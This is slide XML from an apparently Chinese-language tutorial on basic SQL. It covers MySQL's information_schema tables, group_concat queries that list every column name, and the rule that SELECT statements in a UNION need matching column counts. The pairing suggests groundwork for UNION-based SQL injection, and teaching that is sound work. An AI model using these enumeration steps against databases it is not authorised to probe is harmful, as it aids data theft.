              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>中重要的列：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>当前用户的数据库中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有列的列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>列所在的数据库的库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>列所在表的表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368945C2-5278-4C21-B844-37A722C37B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="3608100"/>
            <a:ext cx="3057247" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查询所有的列名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459872D3-9E8F-4502-8157-7E634C2017F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="4068703"/>
            <a:ext cx="11933092" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BDA51B-D57F-4157-AF31-3E79619236E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577426" y="4694107"/>
            <a:ext cx="5391219" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查询表名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>中所有列的列名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CFD1D8-D6C1-4423-9BCE-8E8FA5E77646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569570" y="5280782"/>
            <a:ext cx="11493476" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>														where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>='xxx';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4107198725"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838490" y="1088971"/>
            <a:ext cx="5083443" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6AF6DB-5FB7-461C-8BC7-559EA2CC1FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="675486500"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="615462" y="1802517"/>
          <a:ext cx="11035364" cy="4290555"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4426690">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4079662959"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2033351">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2867790579"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4575323">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4228011216"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="522056">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>表名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>列名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>列的内容</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4149382206"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="909942">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1"/>
                        <a:t>Information_schema.schemata</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>库的信息</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Schema_name</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>存储当前用户所有数据库的库名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3620386128"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="519335">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1"/>
                        <a:t>Information_schema.tables</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>表的信息</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Table_name</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>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100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>当前用户的数据库中的所有表的表名</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
